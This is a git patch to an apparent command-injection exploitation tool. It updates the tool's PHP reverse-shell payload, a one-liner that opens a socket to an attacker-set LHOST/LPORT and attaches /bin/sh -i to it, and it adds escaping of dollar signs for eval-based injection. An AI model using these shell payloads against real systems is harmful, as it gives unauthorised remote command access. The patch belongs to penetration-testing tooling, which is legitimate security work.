From fa8a9723e3197a30cca0dbbe5e855f3e5620a714 Mon Sep 17 00:00:00 2001
From: stasinopoulos <an.stasinopoulos@gmail.com>
Date: Fri, 25 Oct 2024 08:41:24 +0300
Subject: [PATCH] Minor update regarding  "PHP-reverse-shell" payload

---
 src/core/requests/requests.py  | 1 +
 src/core/shells/bind_tcp.py    | 2 ++
 src/core/shells/reverse_tcp.py | 4 +++-
 src/utils/settings.py          | 2 +-
 4 files changed, 7 insertions(+), 2 deletions(-)

diff --git a/src/core/requests/requests.py b/src/core/requests/requests.py
index 8fc20e6d42..92e148c2cf 100755
--- a/src/core/requests/requests.py
+++ b/src/core/requests/requests.py
@@ -261,6 +261,7 @@ def estimate_response_time(url, timesec, http_request_method):
 Exceptions regarding requests failure(s)
 """
 def request_failed(err_msg):
+
   settings.VALID_URL = False
 
   try:
diff --git a/src/core/shells/bind_tcp.py b/src/core/shells/bind_tcp.py
index bd1c622c4a..840519ddb7 100755
--- a/src/core/shells/bind_tcp.py
+++ b/src/core/shells/bind_tcp.py
@@ -323,6 +323,8 @@ def bind_tcp_options(separator):
     # Option 2 - Other (Netcat-Without-Netcat) shells
     elif bind_tcp_option == '2' :
       bind_tcp_option = other_bind_shells(separator)
+      if settings.EVAL_BASED_STATE != False:
+        bind_tcp_option = bind_tcp_option.replace("$","\\$")
       if bind_tcp_option.lower() not in settings.SHELL_OPTIONS:
         checks.shell_success("bind")
         break
diff --git a/src/core/shells/reverse_tcp.py b/src/core/shells/reverse_tcp.py
index e901ee2a6f..c953f01723 100755
--- a/src/core/shells/reverse_tcp.py
+++ b/src/core/shells/reverse_tcp.py
@@ -116,7 +116,7 @@ def other_reverse_shells(separator):
     # PHP-reverse-shell
     if other_shell == '1':
       other_shell = "php -r '$sock=fsockopen(\"" + settings.LHOST + "\"," + settings.LPORT + ");" \
-                    "exec(\"/bin/sh -i <%263 >%263 2>%263\");'"
+                    "$proc=proc_open(\"/bin/sh -i\",array(0%3d>$sock,1%3d>$sock,2%3d>$sock),$pipes);'"
       break
 
     # Perl-reverse-shell
@@ -500,6 +500,8 @@ def reverse_tcp_options(separator):
     # Option 2 - Other (Netcat-Without-Netcat) shells
     elif reverse_tcp_option == '2' :
       reverse_tcp_option = other_reverse_shells(separator)
+      if settings.EVAL_BASED_STATE != False:
+        reverse_tcp_option = reverse_tcp_option.replace("$","\\$")
       if reverse_tcp_option.lower() not in settings.SHELL_OPTIONS:
         checks.shell_success("reverse")
         break
diff --git a/src/utils/settings.py b/src/utils/settings.py
index 38f5fed956..ca3440f045 100755
--- a/src/utils/settings.py
+++ b/src/utils/settings.py
@@ -262,7 +262,7 @@ def sys_argv_errors():
 DESCRIPTION = "The command injection exploiter"
 AUTHOR  = "Anastasios Stasinopoulos"
 VERSION_NUM = "4.0"
-REVISION = "105"
+REVISION = "106"
 STABLE_RELEASE = False
 VERSION = "v"
 if STABLE_RELEASE: